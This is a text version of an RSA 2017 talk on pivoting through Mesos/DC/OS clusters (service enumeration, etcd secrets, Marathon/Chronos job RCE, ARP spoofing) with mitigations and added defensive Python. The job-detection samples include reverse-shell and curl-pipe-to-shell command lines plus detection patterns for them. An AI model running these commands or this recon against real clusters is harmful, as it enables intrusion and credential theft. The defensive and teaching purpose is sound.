Orchestration Ownage: Exploiting Container-Centric Datacenter Platforms
RSA Conference 2017 (#RSAC), session ID CSV-R03
Bryce Kunz, Senior Threat Specialist, Adobe
Mike Mellor, Director, Information Security, Adobe

Intro (slide 2)
Mike Mellor, Director, Information Security @ Adobe
Bryce Kunz, Senior Threat Specialist @ Adobe

Containers - The Future is Now! (slide 3)
2016 surveys:
15-16% of all organizations are already using containers in production
35% of organizations have done a proof-of-concept
The future is now: containers are in production now, and containers are continuing to grow in popularity

Containers appear more secure (slide 4)
2016 surveys:
The biggest drivers: 39% to increase developer efficiency and 36% to support microservices
Organizations want to avoid cloud platform lock-in
Many (42%) organizations gain value in the "secure/isolated" capabilities that containers provide

But managing containers feels complex (slide 5)
2016 survey: the more exposure an organization has to containers, the more complexities are exposed.
Respondents said they found containers "too complex to integrate into existing environments," and that they require "too many skilled resources to manage."

And are very challenging to manage at scale (slide 6)
2016 survey: the #1 challenge of containers, according to the 53% of respondents who are either using or evaluating containers, is "container management."

Probable Security Nightmare (slide 7)
"Too complex" + challenging to manage = probable security nightmare
"Complexity is the worst enemy of security" - Bruce Schneier

Container and Cluster Management Options (slide 8)
Technology | Design | Pros | Cons
Public Cloud Container Services | Container centric | Easy, scalable | Vendor lock-in; proprietary
Docker Swarm | Docker centric | Native clustering | Limited by API
Kubernetes | Clusters of containerized apps | Works w/ Docker; mounts persistent volumes | Custom overlay requires more specialization
Mesos & DC/OS | Cluster management | Works w/ Docker, Kubernetes, & native apps; very flexible | Additional layers add more complexity

Cluster Management (slide 9)
Many servers (CoreOS or another Linux OS) spread across a datacenter, AWS, Azure, GCE, etc.
How do we effectively use all of these resources?

Mesos Master & Agents (slide 10)
Mesos Master: 5050/TCP by default; distributes tasks
Mesos Agent: 5051/TCP by default; executes tasks
The servers (CoreOS / Linux OS, in the datacenter, Azure, AWS, GCE, etc.) run a Master and Agents

Mesos is the Kernel of DC/OS (slide 11)
Mesos (the Master and Agents) is the kernel of the distributed operating system known as DC/OS

Frameworks (slide 12)
Frameworks provide the logic, layered on the Mesos kernel
Init jobs: Marathon
Cron jobs: Chronos, Metronome

Supporting: Configuration Stores (slide 13)
Configuration stores keep everyone on the same page: ZooKeeper, etcd

Supporting: Discovery (slide 14)
Discovery enables the finding of other services within the cluster: Mesos-DNS

DC/OS Design (slide 15)
Layers: kernel (Mesos Master and Agents), frameworks, supporting services, and apps
Apps: containers with apps (Docker containers, web apps, etc.)

Internet Accessible Containers (slide 16)
Containers with apps are either public (Internet accessible) or private (internal)

Scenario (slide 17)
Initial access (RCE) via a vulnerable web application, into a container, as a limited user (e.g. www-data)

Scenario: RCE via web app within a container (slide 18)
e.g. JBoss, Tomcat, OSGi Console, Axis2, etc.

Recon via Mesos-DNS (slide 19)
Query via pivot: Mesos-DNS, 53/UDP & TCP (DNS service)

.mesos TLD (slide 20)
The easy way to find services within the cluster
Mesos-DNS names every task <task>.<framework>.mesos (e.g. web.marathon.mesos) and publishes SRV records as _<task>._tcp.<framework>.mesos, so ordinary DNS lookups from the compromised container already enumerate services and their ports.

Recon via Mesos-DNS (slide 21)
Query via pivot: Mesos-DNS, 8123/TCP by default (DNS via REST API); service discovery within the cluster

Undocumented? (slide 22)
/v1/enumerate -> all Mesos-DNS information

Enumerate Mesos-DNS using the REST API (slide 23)
Request GET /v1/enumerate against Mesos-DNS on 8123/TCP

Find IP & RHP (random high port) TCP ports of all services (slide 24)
The response contains all Mesos-DNS information: the IP and random high port of every service in the cluster
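An added example (editor's code, not from the talk) that turns the /v1/enumerate response into a service inventory, which is what the three slides above do by hand from a screenshot. The JSON is constructed to mirror the shape Mesos-DNS returns (frameworks -> tasks -> records with name/host/rtype); that shape, and the assumption that an SRV record's host is written as target:port, are taken from the Mesos-DNS REST API and should be checked against the version you run. All names, IPs and ports are made up.

```python
"""Build a service inventory from a Mesos-DNS /v1/enumerate response.

Added example, not the talk's code. SAMPLE_ENUMERATE is constructed to
mirror the JSON returned by GET http://<mesos-dns>:8123/v1/enumerate
(frameworks -> tasks -> records); the field names and the "target:port"
form of an SRV host are assumptions about the Mesos-DNS REST API.
"""
import json
import re

# Constructed sample: two instances of a Marathon web app and one Chronos job.
SAMPLE_ENUMERATE = json.dumps({
    "frameworks": [
        {"name": "marathon", "tasks": [
            {"id": "web.0f3a8c", "name": "web", "records": [
                {"name": "web.marathon.mesos.", "host": "10.0.1.5", "rtype": "A"},
                {"name": "_web._tcp.marathon.mesos.",
                 "host": "web-0f3a8c.marathon.slave.mesos.:31001", "rtype": "SRV"},
            ]},
            {"id": "web.8c21d0", "name": "web", "records": [
                {"name": "web.marathon.mesos.", "host": "10.0.1.7", "rtype": "A"},
                {"name": "_web._tcp.marathon.mesos.",
                 "host": "web-8c21d0.marathon.slave.mesos.:31004", "rtype": "SRV"},
            ]},
        ]},
        {"name": "chronos", "tasks": [
            {"id": "ct:1487000000000:0:nightly-etl:", "name": "nightly-etl", "records": [
                {"name": "nightly-etl.chronos.mesos.", "host": "10.0.2.9", "rtype": "A"},
                {"name": "_nightly-etl._tcp.chronos.mesos.",
                 "host": "nightly-etl.chronos.slave.mesos.:31200", "rtype": "SRV"},
            ]},
        ]},
    ]
})

_SRV_TARGET = re.compile(r"^(?P<target>.+?):(?P<port>\d+)$")


def parse_enumerate(body):
    """Map each service name to its framework, .mesos names and instances.

    Instances keep the A-record IPs and SRV ports of one task together, so a
    later port scan hits real (ip, port) pairs instead of a cross product.
    """
    inventory = {}
    for fw in json.loads(body).get("frameworks", []):
        for task in fw.get("tasks", []):
            entry = inventory.setdefault(task["name"], {
                "framework": fw["name"], "dns_names": set(), "instances": []})
            inst = {"task_id": task["id"], "ips": set(), "ports": set()}
            for rec in task.get("records", []):
                entry["dns_names"].add(rec["name"].rstrip("."))
                if rec["rtype"] in ("A", "AAAA"):
                    inst["ips"].add(rec["host"])
                elif rec["rtype"] == "SRV":
                    m = _SRV_TARGET.match(rec["host"])
                    if m:
                        inst["ports"].add(int(m.group("port")))
            entry["instances"].append(inst)
    return inventory


def service_targets(inventory):
    """Flatten the inventory to sorted 'ip:port' strings, one per instance."""
    targets = set()
    for entry in inventory.values():
        for inst in entry["instances"]:
            for ip in inst["ips"]:
                for port in inst["ports"]:
                    targets.add(f"{ip}:{port}")
    return sorted(targets)


if __name__ == "__main__":
    inv = parse_enumerate(SAMPLE_ENUMERATE)
    for name, entry in sorted(inv.items()):
        print(f"{name} ({entry['framework']}): {', '.join(sorted(entry['dns_names']))}")
    print("targets:", service_targets(inv))
```

The same parser doubles as the check for the mitigation on the next slide: once enumeration is disabled, a GET to /v1/enumerate from an application container should no longer return a body this function can parse into anything.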

Secure: Disable Risky Mesos-DNS Features (slide 25)
Disable the "AXFR" and "Enumerate" API calls
• Harder for an attacker to discover all services
• Applications shouldn't commonly be using these API calls

Recon via Mesos Master (slide 26)
Query via pivot: Mesos Master, 5050/TCP by default; distributes tasks

Enumerate Mesos Master (slide 27)
Request via the REST API

Enumerate Mesos Master (slide 28)
Response: JSON with the IP addresses of all Mesos Agents within the cluster

Recon via Mesos Agent (slide 29)
Query via pivot: Mesos Agent, 5051/TCP by default; executes tasks

Enumerate Mesos Agent (slide 30)
Request via the REST API

Enumerate Mesos Agent (slide 31)
Response: JSON with what containers are currently running on the server (e.g. basic0012)
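An added example (editor's code, not from the talk) that joins the two responses just shown: agent addresses from the Master's state endpoint and running tasks from each Agent's state endpoint. The field names (a "slaves" list with a "pid" of the form slave(1)@IP:PORT on the master; frameworks -> executors -> tasks on the agent) are assumed from the Mesos HTTP API; every ID, hostname, IP and container ID in the samples is constructed.

```python
"""Map a Mesos cluster from the master and agent state endpoints.

Added example, not the talk's code. The samples mirror the assumed shapes of
GET http://<master>:5050/master/state and GET http://<agent>:5051/state;
all identifiers are constructed.
"""
import json
import re

SAMPLE_MASTER_STATE = json.dumps({
    "version": "1.1.0",
    "leader": "master@10.0.0.2:5050",
    "slaves": [
        {"id": "c3a1-S0", "hostname": "agent01.example.internal",
         "pid": "slave(1)@10.0.1.5:5051", "active": True},
        {"id": "c3a1-S1", "hostname": "agent02.example.internal",
         "pid": "slave(1)@10.0.1.7:5051", "active": True},
    ],
})

SAMPLE_AGENT_STATE = json.dumps({
    "id": "c3a1-S0",
    "hostname": "agent01.example.internal",
    "frameworks": [
        {"name": "marathon", "executors": [
            {"id": "web.0f3a8c", "container": "6f1c2b0e-0000-4000-8000-000000000001",
             "tasks": [{"id": "web.0f3a8c", "name": "web", "state": "TASK_RUNNING"}]},
            {"id": "basic0012.77aa1f", "container": "6f1c2b0e-0000-4000-8000-000000000002",
             "tasks": [{"id": "basic0012.77aa1f", "name": "basic0012", "state": "TASK_RUNNING"}]},
        ]},
        {"name": "chronos", "executors": [
            {"id": "ct:1487000000000:0:nightly-etl:",
             "container": "6f1c2b0e-0000-4000-8000-000000000003",
             "tasks": [],
             "completed_tasks": [{"id": "ct:1487000000000:0:nightly-etl:",
                                  "name": "nightly-etl", "state": "TASK_FINISHED"}]},
        ]},
    ],
})

_PID = re.compile(r"@(?P<ip>[^:@]+):(?P<port>\d+)$")


def agents_from_master(body):
    """Return [(agent_id, ip, port)] for every agent in a /master/state body."""
    agents = []
    for slave in json.loads(body).get("slaves", []):
        m = _PID.search(slave.get("pid", ""))
        if m:
            agents.append((slave["id"], m.group("ip"), int(m.group("port"))))
    return agents


def running_tasks(body):
    """Return [(framework, task_name, task_id, container_id)] for live tasks.

    Only an executor's "tasks" list counts; "completed_tasks" is ignored and
    the task state is checked as well, so finished jobs do not show up.
    """
    running = []
    for fw in json.loads(body).get("frameworks", []):
        for ex in fw.get("executors", []):
            for task in ex.get("tasks", []):
                if task.get("state") == "TASK_RUNNING":
                    running.append((fw["name"], task["name"], task["id"], ex.get("container")))
    return running


def cluster_map(master_body, agent_bodies):
    """Join both views into {agent_ip: [task_name, ...]}.

    agent_bodies maps an agent IP to its /state body; agents the master
    lists but whose state was not fetched appear with an empty list.
    """
    cluster = {}
    for _agent_id, ip, _port in agents_from_master(master_body):
        body = agent_bodies.get(ip)
        cluster[ip] = [t[1] for t in running_tasks(body)] if body else []
    return cluster


if __name__ == "__main__":
    print(agents_from_master(SAMPLE_MASTER_STATE))
    print(cluster_map(SAMPLE_MASTER_STATE, {"10.0.1.5": SAMPLE_AGENT_STATE}))
```

Nothing here needs credentials in a default install, which is the point of the next two slides: the same two requests, sent from a management zone that the application zone cannot reach, would have stopped at the network.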

Secure: Logical Internal Network Segmentation (slide 32)
Separates the network into zones: apps w/ data, management
Commonly with Calico, Canal, or Flannel
(Flannel by itself only provides the overlay network; enforcing a zone boundary needs a policy engine such as Calico, which is what Canal adds on top of Flannel.)

Secrets via Configuration Store (slide 33)
etcd: 2379/TCP (client/server) and 2380/TCP (peers) by default; configuration store for CoreOS fleet units and applications
ZooKeeper: 2181/TCP by default; binary protocol

Enumerate etcd (slide 34)
Request via the REST API recursively

Enumerate etcd (slide 35)
Response: JSON frequently containing secrets, including credentials
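An added example (editor's code, not from the talk) that walks the recursive listing from the previous slide and flags the leaves that are probably credentials, so a defender can run the same query the attacker would and see what is sitting in the store. The body mirrors the shape of etcd's v2 API response to GET /v2/keys/?recursive=true (a "node" whose "dir" entries carry "nodes", leaves carry "value"); the keys and values are constructed, the AWS key ID is Amazon's documented example value, and the detection rules are the editor's heuristics.

```python
"""Walk an etcd v2 recursive listing and flag keys that look like secrets.

Added example, not the talk's code. SAMPLE_ETCD is constructed in the shape
of GET http://<etcd>:2379/v2/keys/?recursive=true; the rules are heuristics.
"""
import json
import re

SAMPLE_ETCD = json.dumps({
    "action": "get",
    "node": {"key": "/", "dir": True, "nodes": [
        {"key": "/coreos.com", "dir": True, "nodes": [
            {"key": "/coreos.com/fleet", "dir": True, "nodes": [
                {"key": "/coreos.com/fleet/machines", "dir": True, "nodes": [
                    {"key": "/coreos.com/fleet/machines/2f1d", "dir": True, "nodes": [
                        {"key": "/coreos.com/fleet/machines/2f1d/object",
                         "value": "{\"ID\":\"2f1d\",\"PublicIP\":\"10.0.1.5\"}"}]}]}]}]},
        {"key": "/apps", "dir": True, "nodes": [
            {"key": "/apps/web", "dir": True, "nodes": [
                {"key": "/apps/web/db_url", "value": "postgres://10.0.3.4:5432/shop"},
                {"key": "/apps/web/db_password", "value": "s3cr3t-pass"},
                {"key": "/apps/web/marathon_auth",
                 "value": "Basic bWFyYXRob246aHVudGVyMg=="}]},
            {"key": "/apps/etl", "dir": True, "nodes": [
                {"key": "/apps/etl/aws_access_key_id", "value": "AKIAIOSFODNN7EXAMPLE"},
                {"key": "/apps/etl/s3_bucket", "value": "shop-exports"}]}]},
    ]},
})

# Key names that usually hold credentials (matched on the last path segment).
_SECRET_KEY = re.compile(
    r"(pass(word|wd)?|secret|token|api[_-]?key|access[_-]?key|private[_-]?key|auth|credential)",
    re.IGNORECASE)
# Value shapes that are credentials regardless of what the key is called.
_SECRET_VALUES = [
    ("AWS access key ID", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("HTTP Basic credentials", re.compile(r"^Basic [A-Za-z0-9+/]+=*$")),
    ("URL with embedded password", re.compile(r"://[^/@:]+:[^/@]+@")),
    ("PEM private key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
]


def flatten_keys(body):
    """Yield (key, value) for every leaf under the listing's root node."""
    def walk(node):
        if node.get("dir"):
            for child in node.get("nodes", []):
                yield from walk(child)
        else:
            yield node["key"], node.get("value", "")
    yield from walk(json.loads(body)["node"])


def find_secrets(body):
    """Return [(key, [reasons])] for leaves whose key name or value looks secret."""
    hits = []
    for key, value in flatten_keys(body):
        reasons = []
        if _SECRET_KEY.search(key.rsplit("/", 1)[-1]):
            reasons.append("secret-looking key name")
        for label, pattern in _SECRET_VALUES:
            if pattern.search(value):
                reasons.append(label)
        if reasons:
            hits.append((key, reasons))
    return hits


if __name__ == "__main__":
    for key, reasons in find_secrets(SAMPLE_ETCD):
        print(f"{key}: {', '.join(reasons)}")
```

Every hit this prints is a credential an attacker in any application container could have read with one unauthenticated GET. etcd's v2 API does support role-based authentication (enabled with etcdctl auth enable after creating a root user) and client-certificate TLS, which is the separation the next slide calls for.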

Secure: Separate Configuration Stores (slide 36)
Separate the configuration stores into zones: apps w/ data, management
Enforce the separation via authentication credentials and logical network segmentation

Frameworks (slide 37)
Marathon: long-running services (e.g. containers); ensures they are always running
Chronos: cron for the cluster; batch jobs

RCE via Marathon Jobs (slide 38)
Request via the REST API

RCE via Marathon Jobs (slide 39)
A job submitted to Marathon from the compromised container is scheduled by the Master and executed on an Agent, giving a second RCE outside the original container

RCE via Marathon Jobs (slide 40)
Response: JSON with the malicious job status

RCE via Chronos Jobs (slide 41)
The same pivot via a Chronos job (cron for the cluster; batch jobs)
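The job definitions the attacker submits in the Marathon and Chronos slides above are also what a defender can read back from the same REST APIs. An added example (editor's code, not from the talk) that scans both listings for jobs that look like the pivot: the shapes follow GET /v2/apps on Marathon (an "apps" list with "id", "cmd", "container", "instances", "version") and GET /scheduler/jobs on Chronos (a list with "name", "command", "schedule", "owner"), as assumed from those APIs; every entry is constructed, the trusted registry prefix is an assumption, and the rules are the editor's own heuristics rather than a published ruleset.

```python
"""Flag suspicious Marathon apps and Chronos jobs from their REST listings.

Added example, not the talk's code. The samples are constructed in the assumed
shapes of Marathon's /v2/apps and Chronos's /scheduler/jobs responses.
"""
import json
import re

SAMPLE_MARATHON_APPS = json.dumps({"apps": [
    {"id": "/shop/web", "cmd": None, "instances": 3,
     "container": {"type": "DOCKER", "docker": {"image": "registry.internal/shop/web:1.4.2"}},
     "version": "2017-02-01T10:00:00.000Z"},
    {"id": "/tmp-x1", "cmd": "bash -i >& /dev/tcp/10.0.1.5/4444 0>&1", "instances": 1,
     "container": None, "version": "2017-02-14T03:12:09.000Z"},
    {"id": "/etl/nightly", "cmd": "curl -s http://203.0.113.7/p.sh | sh", "instances": 1,
     "container": {"type": "DOCKER", "docker": {"image": "alpine:3.5"}},
     "version": "2017-02-14T03:14:51.000Z"},
]})

SAMPLE_CHRONOS_JOBS = json.dumps([
    {"name": "report-daily", "command": "/opt/etl/report.sh",
     "schedule": "R/2017-02-01T02:00:00Z/P1D", "owner": "etl@example.internal"},
    {"name": "x", "command": "nc -e /bin/sh 10.0.1.5 4444",
     "schedule": "R/2017-02-14T03:15:00Z/PT1M", "owner": ""},
])

# Command patterns that have no business in a production job definition.
COMMAND_RULES = [
    ("reverse shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bsocat\b.*exec:|bash -i\b")),
    ("remote script piped to a shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")),
    ("inline interpreter one-liner", re.compile(r"\b(python[23]?|perl|ruby)\s+-[ec]\s")),
]
TRUSTED_REGISTRY = "registry.internal/"   # assumed prefix of the internal registry


def _command_findings(command):
    """Labels of every rule the command string trips (none for an empty cmd)."""
    return [label for label, pattern in COMMAND_RULES if command and pattern.search(command)]


def suspicious_marathon_apps(body, trusted_registry=TRUSTED_REGISTRY):
    """Return [(app_id, reasons)] for apps with a suspect cmd or an untrusted image."""
    findings = []
    for app in json.loads(body).get("apps", []):
        reasons = _command_findings(app.get("cmd"))
        image = ((app.get("container") or {}).get("docker") or {}).get("image")
        if image and not image.startswith(trusted_registry):
            reasons.append(f"image outside trusted registry: {image}")
        if reasons:
            findings.append((app["id"], reasons))
    return findings


def suspicious_chronos_jobs(body):
    """Return [(job_name, reasons)] for jobs with a suspect command or no owner."""
    findings = []
    for job in json.loads(body):
        reasons = _command_findings(job.get("command"))
        if not job.get("owner"):
            reasons.append("no owner recorded")
        if reasons:
            findings.append((job["name"], reasons))
    return findings


if __name__ == "__main__":
    for app_id, reasons in suspicious_marathon_apps(SAMPLE_MARATHON_APPS):
        print("marathon", app_id, reasons)
    for name, reasons in suspicious_chronos_jobs(SAMPLE_CHRONOS_JOBS):
        print("chronos", name, reasons)
```

Polling the listings is a stop-gap; a job created by anyone who can reach the API is still executed before the scan runs, which is why the next slide moves the control to authentication on the API itself.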

Secure: Enforce Authentication (slide 42)
Applications must support and be configured to use authentication as well, securely store and use credentials, and be deployed securely and/or retrieve credentials securely
Alert on brute-force attempts

Creds via MitM with ARP Spoofing (slide 43)
Another container has the creds for Marathon

Creds via MitM with ARP Spoofing (slide 44)
The attacker uses ARP spoofing to redirect that container's traffic to the compromised container and collects the credentials
(This needs the two containers to share a layer-2 segment, such as the same host's bridge, and the compromised container to be able to send raw frames; Docker's default capability set includes CAP_NET_RAW, so an unhardened container can.)

Creds via MitM with ARP Spoofing (slide 45)
The attacker can now create malicious Marathon jobs, negating the authentication security controls

Secure: TLS for Internal Communications (slide 46)
Enable TLS w/ valid certificates for strong HTTPS communications; anything using credentials needs TLS!
Validate certificates, fail closed on bad certificates, and alert on certificate errors

Strategic Actions (slide 47)
Next week:
Assess which services you can enable authentication & TLS on without breaking your existing applications within the cluster
Three months from now:
Implement authentication & TLS on safe services and frameworks, focusing on services responsible for orchestration within the cluster
Deploy separate services where possible for apps that do not support TLS & auth
Six months from now:
Retrofit all applications within the cluster to use TLS & authentication
Enforce the use of TLS & authentication internally everywhere (disable clear-text)
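The "next week" assessment is a survey of which orchestration endpoints still answer in clear-text and without credentials. An added example (editor's code, not from the talk) that does that survey: for each endpoint it tries plain HTTP first and, only if nothing HTTP-shaped comes back, HTTPS with full certificate validation, reporting a bad certificate rather than bypassing it (fail closed, as slide 46 asks). The default ports are the ones the slides list plus the usual Marathon (8080) and Chronos (4400) ports, and the paths are assumed from each service's API. The stub server at the bottom is a constructed stand-in so the audit runs offline; point run_audit() at real hosts to use it.

```python
"""Audit orchestration endpoints for clear-text and unauthenticated access.

Added example, not the talk's code. Ports/paths are assumptions to adjust;
the stub server is a constructed stand-in for a cluster.
"""
import http.client
import json
import ssl
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

DEFAULT_ENDPOINTS = [
    ("mesos-master", 5050, "/master/state"),
    ("mesos-agent", 5051, "/state"),
    ("marathon", 8080, "/v2/apps"),
    ("chronos", 4400, "/scheduler/jobs"),
    ("mesos-dns", 8123, "/v1/enumerate"),
    ("etcd", 2379, "/v2/keys/?recursive=true"),
]


def _http_status(conn, path):
    """GET path on an open connection; None when no HTTP reply came back."""
    try:
        conn.request("GET", path)
        return conn.getresponse().status
    except (http.client.HTTPException, OSError):
        return None
    finally:
        conn.close()


def probe(host, port, path, timeout=2.0):
    """Classify one endpoint: scheme, status, clear_text, auth_required, exposed."""
    finding = {"host": host, "port": port, "path": path, "scheme": None,
               "status": None, "tls_error": None}
    status = _http_status(http.client.HTTPConnection(host, port, timeout=timeout), path)
    if status is not None:
        finding["scheme"] = "http"                 # answered in clear-text
    else:
        conn = http.client.HTTPSConnection(host, port, timeout=timeout,
                                           context=ssl.create_default_context())
        try:
            conn.request("GET", path)
            status = conn.getresponse().status
            finding["scheme"] = "https"
        except ssl.SSLError as exc:                # includes certificate failures
            finding["tls_error"] = getattr(exc, "reason", None) or type(exc).__name__
        except (http.client.HTTPException, OSError):
            pass                                   # nothing listening / not HTTP
        finally:
            conn.close()
    finding["status"] = status
    finding["clear_text"] = finding["scheme"] == "http"
    finding["auth_required"] = status in (401, 403)
    # Worst case from the talk: data handed out in clear-text with no credentials asked.
    finding["exposed"] = finding["clear_text"] and status == 200
    return finding


def run_audit(host, endpoints=DEFAULT_ENDPOINTS, timeout=2.0):
    """Probe every endpoint on one host; returns a list of finding dicts."""
    return [dict(service=name, **probe(host, port, path, timeout))
            for name, port, path in endpoints]


class _StubHandler(BaseHTTPRequestHandler):
    """Constructed stand-in: /master/state is wide open, /v2/apps wants creds."""
    def do_GET(self):
        if self.path == "/master/state":
            body = json.dumps({"slaves": [{"pid": "slave(1)@10.0.1.5:5051"}]}).encode()
            self._reply(200, body, [("Content-Type", "application/json")])
        elif self.path == "/v2/apps":
            self._reply(401, b"", [("WWW-Authenticate", 'Basic realm="marathon"')])
        else:
            self._reply(404, b"", [])

    def _reply(self, status, body, headers):
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass


def start_stub():
    """Start the stub on a free loopback port; returns (server, port)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), _StubHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_stub()
    try:
        for f in run_audit("127.0.0.1", [("stub-master", port, "/master/state"),
                                         ("stub-marathon", port, "/v2/apps")]):
            print(f)
    finally:
        server.shutdown()
```

Read the three flags together: clear_text with auth_required is still a finding, because the credentials the client sends are what the ARP-spoofing slides capture; only an endpoint that is neither clear_text nor exposed has reached the "six months from now" state.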

Big Picture (slide 48)
Container adoption is maturing, especially in enterprises; enterprises are using containers in production.

Big Picture (slide 49)
Pivoting from a compromised service within the cluster, with no container breakout / 0day / exploit needed, may enable an attacker to completely compromise the cluster

Big Picture (slide 50)
Looking beyond the border with a defense-in-depth strategy secures the future & the cluster

Thank you! (slide 51)

Future Research (slide 52)
Testing MitM from a compromised container: NCC Group's report states this is possible for co-hosted containers
Test downgrading HTTPS communications: can we downgrade from HTTPS to HTTP and capture creds from another container?
Test certs (e.g. can cert pinning be enabled?) to REST APIs: can we MitM and impersonate the API service?
Test authentication brute-force attacks: fairly certain there are no lockouts; can we enable better authentication security? Write a module to brute-force and guess creds
Test logical network segmentation tools (Calico, Canal, Flannel): these should work as advertised, but we should probably independently verify

References (slide 53)
https://www.cloudfoundry.org/wp-content/uploads/2016/06/Cloud-Foundry-2016-Container-Report.pdf
https://clusterhq.com/assets/pdfs/state-of-container-usage-june-2016.pdf
http://www.rightscale.com/blog/cloud-industry-insights/new-devops-trends-2016-state-cloud-survey

UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 

Recently uploaded (20)

PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
